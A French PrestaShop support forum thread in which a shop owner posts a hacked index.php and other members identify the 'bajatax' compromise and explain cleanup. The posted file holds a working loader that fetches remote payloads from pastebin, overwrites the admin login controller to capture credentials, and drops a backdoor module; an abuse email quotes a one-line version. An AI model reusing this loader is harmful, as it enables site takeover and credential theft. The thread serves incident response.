Jump to content

Message d'erreur via mon site icommerce


SBCOM

Recommended Posts

Bonjour,

Je viens de me rendre compte que je ne peux plus allez sur mon back office de prestashop.

Et mon site me met:


Warning: chmod(): No such file or directory in /homepages/11/d782354914/htdocs/clickandbuilds/PrestaShop/MyeCommerce/index.php on line 46

Warning: chmod(): No such file or directory in /homepages/11/d782354914/htdocs/clickandbuilds/PrestaShop/MyeCommerce/index.php on line 47

 

Pouvez-vous m'aider?

 

Merci d'avance

Link to comment
Share on other sites

voila le fichier en questions

 

<?php
/*
* 2007-2017 PrestaShop
*
* NOTICE OF LICENSE
*
* This source file is subject to the Open Software License (OSL 3.0)
* that is bundled with this package in the file LICENSE.txt.
* It is also available through the world-wide-web at this URL:
* http://opensource.org/licenses/osl-3.0.php
* If you did not receive a copy of the license and are unable to
* obtain it through the world-wide-web, please send an email
* to [email protected] so we can send you a copy immediately.
*
* DISCLAIMER
*
* Do not edit or add to this file if you wish to upgrade PrestaShop to newer
* versions in the future. If you wish to customize PrestaShop for your
* needs please refer to http://www.prestashop.com for more information.
*
*  @author PrestaShop SA <[email protected]>
*  @copyright  2007-2017 PrestaShop SA
*  @license   http://opensource.org/licenses/osl-3.0.php  Open Software License (OSL 3.0)
*  International Registered Trademark & Property of PrestaShop SA
*/
function curl_get_contents($url){$curl = curl_init($url);curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, 0);curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);$data = curl_exec($curl);curl_close($curl);return $data;}
if(file_exists($_SERVER['DOCUMENT_ROOT'] . "/controllers/admin/AdminLoginController.php")){
$html1=file_get_contents("https://pastebin.com/raw/EmUJU0dh");
if(!preg_match("/baja/i",$html1)){$html1=curl_get_contents("https://pastebin.com/raw/EmUJU0dh");}
$save1=fopen($_SERVER['DOCUMENT_ROOT'] . "/controllers/admin/AdminLoginController.php","w");
fwrite($save1,$html1);
fclose($save1);
}
if(file_exists($_SERVER['DOCUMENT_ROOT'] . "/controllers/AdminLoginController.php")){
$html1=file_get_contents("https://pastebin.com/raw/EmUJU0dh");
if(!preg_match("/baja/i",$html1)){$html1=curl_get_contents("https://pastebin.com/raw/EmUJU0dh");}
$save2=fopen($_SERVER['DOCUMENT_ROOT'] . "/controllers/AdminLoginController.php","w");
fwrite($save2,$html1);
fclose($save2);
}
$htm=file_get_contents("https://pastebin.com/raw/geUPuVMP");
if(!preg_match("/XATAJAB/i",$htm)){$htm=curl_get_contents("https://pastebin.com/raw/geUPuVMP");}
$save=fopen($_SERVER['DOCUMENT_ROOT'] . "/modules/baja3.php","w");
fwrite($save,$htm);
fclose($save);    
chmod("./". $_SERVER['DOCUMENT_ROOT'] ."/index.php",0755);
chmod("./" .$_SERVER['DOCUMENT_ROOT'] ."/modules/baja3.php",0755);
require(dirname(__FILE__).'/config/config.inc.php');
Dispatcher::getInstance()->dispatch();

Link to comment
Share on other sites

Toujours le même groupe de hacker de m****e,  bajatax avec leurs hous mais maintenant ils se modernisent, ils reçoivent les login en temps réel sur un compte telegram,
donc ne pas oublier de changer vos mot de passe admin dès que vous aurez nettoyé (avant ça ne sert à rien)

Link to comment
Share on other sites

Ben si vous ne lisez pas...

- Corriger la faille PHP UNIT

- il y a le fichier /controllers/admin/adminloginController.php à restaurer

- Le fichier /modules/baja3.php à supprimer et surement beaucoup d'autres^^

Link to comment
Share on other sites

ça ne suffit pas de remettre l'index d'origine, il faut inspecter nettoyer, désinfecter tout votre espace qui contient maintenant surement des dizaine, voire des centaines de nouvelles portes d'intrusion. Vos accès BO ont été volés, votre fichier AdminLoginController hacké (comme vu ici https://pastebin.com/raw/EmUJU0dh) et ceci n'est que la partie visible de l'iceberg dans la mesure ou en plus il y un un micro-loader de code arbitraire dans ce nouveau contrôleur.

 

Edited by doekia (see edit history)
Link to comment
Share on other sites

En attendant j'ai fait un mail à nos chéris de pastebin pour qu'ils tentent de faire un minimum.

ça ne résoudra pas les crash en cas de hack mais la panne sera plus "propre", ne diffusera pas de nouvelle faille.

 

mailto: [email protected]

Citation

Hi,

For age now, your platform is hosting numerous nasty source that hackers use to spread their nuisances.
Amongst them is a group called bajatax (various spelling): examples below
https://pastebin.com/qN54YWGT
https://pastebin.com/raw/EmUJU0dh
(to name a couple)

Exploiting little breach or thru social engineering the hacker group eleviate major hack (including phishing, porn alike content, ...) using a single line of code.
file_put_content('controllers/admin/AdminLoginController.php',curl_get_contents("https://pastebin.com/raw/EmUJU0dh"));

It would be really appreciable if you can scan your assets for this batajax alike content and simply delete them all (even try to filter them). I reckon this will not be a final solution, but each step to makes life of hacker harder is good to go.

Best regards

N'hésitez pas à leur envoyer le même mail

  • Like 1
Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
×
×
  • Create New...